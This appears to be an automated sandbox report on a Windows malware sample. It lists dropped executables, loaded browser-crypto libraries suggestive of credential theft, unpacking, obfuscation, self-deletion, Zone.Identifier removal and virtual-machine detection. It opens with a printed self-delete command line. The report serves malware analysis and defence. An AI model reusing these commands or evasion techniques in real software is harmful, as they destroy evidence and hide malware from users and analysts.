Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: mozglue.pdbP source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
Source:	Binary string: nss3.pdb@ source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.12.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.12.dr, vcruntime140.dll.12.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.12.dr, msvcp140[1].dll.12.dr
Source:	Binary string: nss3.pdb source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr
Source:	Binary string: mozglue.pdb source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.12.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Unpacked PE file: 0.2.xvJv1BpknZ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\etrtabd	Unpacked PE file: 6.2.etrtabd.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Unpacked PE file: 7.2.5876.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Unpacked PE file: 7.2.5876.exe.400000.0.unpack

PE file contains sections with non-standard names

Source: sqls[1].dll.12.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.12.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.12.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.12.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.12.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.12.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.12.dr	Static PE information: section name: .didat
Source: nss3.dll.12.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.12.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.12.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.12.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00402CD7 push cs; retf	0_2_00402CD8
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00401EA7 push 0000000Eh; retf 0038h	0_2_00401EB6
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_004033B6 push eax; ret	0_2_00403419
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_02111F0E push 0000000Eh; retf 0038h	0_2_02111F1D
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_02112D3E push cs; retf	0_2_02112D3F
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_02153622 push edx; retf	0_2_02153626
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_0215795A push 0000000Eh; retf 0038h	0_2_02157969
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_02158B40 push eax; ret	0_2_02158B41
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_0215D996 push 0000002Ah; iretd	0_2_0215D9E0
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_021574B7 push ss; iretw	0_2_021574C9
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_021584CC push cs; retf	0_2_021584CD
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_021578EA push cs; retf 0038h	0_2_02157969
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00402CD7 push cs; retf	6_2_00402CD8
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00401EA7 push 0000000Eh; retf 0038h	6_2_00401EB6
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_004033B6 push eax; ret	6_2_00403419
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_020C1F0E push 0000000Eh; retf 0038h	6_2_020C1F1D
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_020C2D3E push cs; retf	6_2_020C2D3F
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_02203927 push edx; retf	6_2_02203BC6
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_0220DF36 push 0000002Ah; iretd	6_2_0220DF80
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_02208A6C push cs; retf	6_2_02208A6D
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_02207A57 push ss; iretw	6_2_02207A69
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_02207E8A push cs; retf 0038h	6_2_02207F09
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_022090E0 push eax; ret	6_2_022090E1
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_02207EFA push 0000000Eh; retf 0038h	6_2_02207F09
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0214030D push ecx; ret	7_2_02140315
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Code function: 11_2_0427B010 push edx; ret	11_2_0427B21F
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Code function: 11_2_0427A910 push edx; ret	11_2_0427A91B

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\EE6.exe	File created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5876.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\msvcp140.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\etrtabd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\EE6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqls[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\softokn3.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\etrtabd

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\xvjv1bpknz.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\etrtabd:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
